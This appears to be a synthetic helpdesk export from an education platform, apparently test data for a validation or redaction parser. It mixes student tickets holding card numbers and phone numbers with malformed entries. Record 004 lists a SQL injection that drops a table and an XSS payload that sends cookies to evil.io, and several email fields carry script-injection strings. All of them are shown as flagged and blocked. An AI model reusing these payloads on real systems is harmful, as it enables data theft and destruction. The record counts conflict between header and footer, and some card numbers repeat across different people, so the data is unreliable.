================================================================================
HELPDESK EXPORT — ALU SUPPORT PLATFORM v3.1.2
Export requested by: compliance@alueducation.com
Export timestamp: 2024-03-15T07:42:11Z
Filters applied: date_range=2024-03-14..2024-03-15, status=ALL
Total records: 14  |  Page 1 of 1
================================================================================


────────────────────────────────────────────────────────────────────────────────
RECORD [001]  |  source: web-form  |  intake: 2024-03-14 08:03:22 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : amara.diallo@gmail.com
subject      : Payment not reflecting on my account

Hi,

I completed my tuition payment yesterday evening around 7:45 PM but my
dashboard still shows a balance. The transaction went through on my end —
bank confirmed it at 19:47. Card used was 4539 1488 0343 6467 (Visa).
Amount was $1,200.00.

Can someone look into this urgently? You can reach me at +221 77 843 20 11.

Thanks
Amara

internal_note : Forwarded to finance team 08:31. Awaiting confirmation.
assigned_to  : f.mensah@alueducation.com
status       : IN_PROGRESS
tags         : #tuition #payment #portal #studentfinance


────────────────────────────────────────────────────────────────────────────────
RECORD [002]  |  source: email-pipe  |  intake: 2024-03-14 08:17:55 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : k.osei22@alumni.alueducation.com
subject      : Alumni membership renewal — card issue

Hey support,

I tried renewing my alumni membership but my Mastercard kept declining.
Card on file: 5425-2334-3010-9903. The charge should be $55.00.
I also have an Amex I can use if needed: 3782 822463 10005.

I'm in Kigali this week. Phone: +250 791 004 532.
After 6 PM reach me at +250 728 113 009.

Note: I tried reaching billing from an old address k.osei@@alumni.alueducation.com
but it bounced — think I mistyped it.

— Kofi

assigned_to  : billing@alueducation.com
status       : PENDING
tags         : #alumni #billing #payment


────────────────────────────────────────────────────────────────────────────────
RECORD [003]  |  source: api-intake  |  intake: 2024-03-14 09:05:40 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : admissions@partner-university.edu
subject      : Credit transfer inquiry for incoming student

To whom it may concern,

We are writing on behalf of an incoming transfer student, Lena Brandt.
Her previous institution email was l.brandt@uni-hamburg.de and she will
be using l.brandt@si.alueducation.com once enrolled.

Please confirm receipt at registrar@alueducation.com or call our office
at +49 40 4123 6789 (Mon-Fri, 09:00-17:00 CET).

Wire transfer fee of $85.00 USD. Payment card: 5194 7382 9012 3456.

Note: a colleague tried cc-ing .communications@partner-university.edu
(starts with a dot — returned undeliverable).

internal_note : Passed to admissions@alueducation.com
status       : PENDING
tags         : #transfer #admissions #SI #international


────────────────────────────────────────────────────────────────────────────────
RECORD [004]  |  source: web-form  |  intake: 2024-03-14 10:31:09 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : <script>alert('xss')</script>@alueducation.com
subject      : [AUTOMATED INTAKE FLAG: SUSPICIOUS_SENDER]

Raw body (sanitized excerpt stored for audit):
  payload_1  : '; drop table student_records; --
  payload_2  : <img src=x onerror=fetch('https://evil.io/steal?c=')>
  payload_3  : javascript:void(0)
  fake_card1 : 0000 0000 0000 0000
  fake_card2 : 1111 1111 1111 1111
  fake_card3 : 9999-9999-9999-9999
  bad_prefix : 9123 4567 8901 2345
  bad_email1 : <script>alert(1)</script>@alueducation.com
  bad_email2 : onerror@alueducation.com
  bad_time1  : 25:99 PM
  bad_time2  : 13:78

internal_note : Blocked at WAF layer. IP logged.
               Reported to security@alueducation.com at 10:32.
status       : REJECTED
flags        : SQL_INJECTION, XSS, MALFORMED_EMAIL, INVALID_CARD
tags         : #security #flagged #blocked


────────────────────────────────────────────────────────────────────────────────
RECORD [005]  |  source: mobile-app  |  intake: 2024-03-14 11:14:38 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : james.mutua@si.alueducation.com
cc           : registrar@alueducation.com
subject      : SI track — module materials not uploaded

Hi,

Three of my module materials for Q1 still aren't on the portal.
I checked at 10:00 AM and again just now at 11:13 AM.

My Rwandan number: +250 788 445 671
My Nigerian backup: +234 802 311 7756

Card on file for materials fee ($45.00): 5425 2334 3010 9903 (Mastercard)

James Mutua
SI Cohort 2024

assigned_to  : content@alueducation.com
status       : IN_PROGRESS
tags         : #SI #modules #portal #content


────────────────────────────────────────────────────────────────────────────────
RECORD [006]  |  source: email-pipe  |  intake: 2024-03-14 12:02:17 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : notareal@     <- rejected at SMTP layer, incomplete domain
subject      : [UNPARSEABLE]

Body fragment recovered:
  incomplete amex  : 3782 822463 100       <- missing last digit
  too long card    : 4539 1488 0343 64678  <- one digit too many
  short number     : +25012
  another short    : +1234
  valid time       : 03:45 AM
  invalid time     : 99:99 PM
  bad emails found in body:
    - @missingusername.com           <- nothing before @
    - javascript:alert@alueducation.com  <- injection in email
    - useralueducation.com           <- missing @ entirely

internal_note : Malformed submission. Logged for pattern analysis.
status       : REJECTED
flags        : MALFORMED_EMAIL, INVALID_TIME, INCOMPLETE_SUBMISSION
tags         : #malformed #flagged


────────────────────────────────────────────────────────────────────────────────
RECORD [007]  |  source: web-form  |  intake: 2024-03-14 13:28:50 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : fatou.ndiaye@outlook.com
cc           : f.ndiaye@alumni.alueducation.com
subject      : Double charge — refund request

Hello,

I was billed twice for the alumni membership renewal at 08:44 AM today.

  TX-001 : $55.00  |  card: 4916 3876 0766 0208 (Visa)
  TX-002 : $55.00  |  card: 4916 3876 0766 0208 (Visa)

Preferred contact: +33 6 12 34 56 78
Secondary: +221 70 929 1144

Note: my colleague tried reaching you from fatou..ndiaye@outlook.com
(double dot — bounced back immediately).

Fatou

assigned_to  : billing@alueducation.com
status       : RESOLVED
tags         : #refund #doublebilling #alumni #billing


────────────────────────────────────────────────────────────────────────────────
RECORD [008]  |  source: api-intake  |  intake: 2024-03-14 15:55:03 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : t.owusu@alueducation.com
subject      : Staff report — suspicious activity on student account

Hi sec team,

Spoofed address used was support@alueducati0n.com (note the zero).
The real support address is support@alueducation.com.

The attempt came in at 3:22 PM today.
Student registered address: p.adeyemi-98@alumni.alueducation.com

Someone also tried submitting from alert(1)@alueducation.com —
flagged immediately by the intake filter.

T. Owusu
IT Security
+250 784 000 312

assigned_to  : security@alueducation.com
status       : MONITORING
tags         : #phishing #security #spoofing #alumni


────────────────────────────────────────────────────────────────────────────────
RECORD [009]  |  source: chat-export  |  intake: 2024-03-15 06:18:44 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : b.kamau@si.alueducation.com
subject      : Re: Scholarship disbursement and phishing alert

  [06:02 AM] b.kamau : Hi! Just checking on the scholarship funds.
  [06:04 AM] agent   : Hi Baraka, yes scheduled for 9:00 AM EAT.
  [06:07 AM] b.kamau : I got an email from scholarships@alueducati0n.com
                        asking me to verify my card: 4532 0151 7834 6578
                        I didn't click anything but wanted to flag it.
  [06:08 AM] agent   : Good catch. Do NOT respond to that.
                        Our real address is scholarships@alueducation.com.
  [06:09 AM] b.kamau : Thanks. My number: +254 712 884 003

status       : ESCALATED
tags         : #phishing #scholarship #SI #security


────────────────────────────────────────────────────────────────────────────────
RECORD [010]  |  source: web-form  |  intake: 2024-03-15 07:18:02 UTC
────────────────────────────────────────────────────────────────────────────────
from_field   : anonymous_proxy@tempmaildomain.xyz
subject      : bulk enquiry

name,email,phone,card
John Doe,j.doe@gmail.com,+1 800 555 0199,4111 1111 1111 1111
Jane Roe,j.roe@@bademail,555-123,0000-0000-0000-0000
ALU Staff,staff@alueducation.com,+250 784 000 312,5500 0000 0000 0004
Alumni,grad@alumni.alueducation.com,+44 7911 123456,4916-3876-0766-0208
SI Student,si.student@si.alueducation.com,+234-803-000-1122,3714 496353 98431
Bad Email,<script>alert(2)</script>@domain.com,+250 788 000 111,4539 1488 0343 6467
Another Bad,javascript:hack@alueducation.com,+250 788 000 222,5194 7382 9012 3456

internal_note : Bulk paste submission. Mixed valid/invalid records.
               visa, mastercard and amex all present in this batch.
               two emails flagged as injection attempts.
status       : PARTIAL_REJECT
tags         : #bulk #mixed #flagged #intake


================================================================================
END OF EXPORT  |  records: 10  |  flagged: 4  |  resolved: 2  |  pending: 4
Reviewed by  : compliance@alueducation.com
================================================================================